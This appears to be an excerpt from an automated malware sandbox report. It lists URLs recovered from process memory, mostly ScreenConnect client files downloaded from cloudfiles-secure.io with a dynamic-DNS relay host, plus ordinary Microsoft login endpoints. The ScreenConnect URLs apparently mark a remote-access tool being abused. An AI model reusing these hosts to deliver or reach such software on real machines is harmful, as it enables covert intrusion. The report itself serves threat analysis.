                  Source: dfsvc.exe, 00000001.00000002.2784738148.000002270845D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Cli
                  Source: dfsvc.exe, 00000001.00000002.2793324674.0000022721B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.ap
                  Source: dfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794699617.0000022724041000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032FF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W0
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WPj
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, CHT0VHXS.log.1.drString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applic
                  Source: dfsvc.exe, 00000001.00000002.2795014048.00000227240A9000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2793471358.0000022721B9A000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284190303.0000000001592000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2285641644.000000001BBDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application%%%
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application.
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application22DW.YBK&
                  Source: dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application5
                  Source: CHT0VHXS.log.1.drString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.o
                  Source: dfsvc.exe, 00000001.00000002.2791465766.00000227204E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationP
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationPNT
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationV
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationX
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.0000000001589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationZ
                  Source: dfsvc.exe, 00000001.00000002.2794699617.0000022724041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationdb01WXG7
                  Source: dfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationest
                  Source: dfsvc.exe, 00000001.00000002.2794699617.0000022724041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationl
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_
                  Source: dfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_n329
                  Source: dfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_re=msil
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationx
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794048940.0000022721C65000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, CHT0VHXS.log.1.drString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest1
                  Source: dfsvc.exe, 00000001.00000002.2794432679.0000022721CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifestt
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientServi
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794432679.0000022721CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dllPj
                  Source: dfsvc.exe, 00000001.00000002.2794432679.0000022721CE5000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2784738148.000002270802E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2793656432.0000022721BC7000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2793656432.0000022721BC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll/uL
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Win
                  Source: dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794699617.0000022724041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2793865046.0000022721C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config%
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.configPj
                  Source: dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClie
                  Source: dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2794699617.0000022724041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileMana8
                  Source: dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794699617.0000022724041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.2783751252.0000022705FBF000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2791465766.00000227204B9000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2793816963.0000022721BF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles-secure.io/Bin/ScrtU
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000006.00000003.2039355807.000001E584D60000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.l
                  Source: svchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000007.00000003.2056652735.000002226536B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000007.00000003.2056652735.000002226536B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000007.00000003.2056321735.000002226532C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056652735.000002226536B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srff
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeyscfg:MaLogi:GetAp
                  Source: svchost.exe, 00000007.00000003.2088786160.0000022265A0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272475845.0000022265A06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3273163204.0000022265AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2210609903.0000022265A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272697084.0000022265A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000007.00000003.2181060174.0000022265AA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf/ZwpMNR
                  Source: svchost.exe, 00000007.00000002.3272475845.0000022265A06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2210609903.0000022265A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfd
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srfice
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056652735.000002226536B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000003.2056652735.000002226536B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfuerP
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000003.2056652735.000002226536B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfD
                  Source: svchost.exe, 00000007.00000003.2056652735.000002226536B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000007.00000003.2056652735.000002226536B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000007.00000003.2056321735.000002226532C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056652735.000002226536B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Do0H57YWgZ7jJjd08iJ
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000007.00000003.2056652735.000002226536B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000007.00000003.2056321735.000002226532C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000007.00000002.3272552281.0000022265A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfom
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
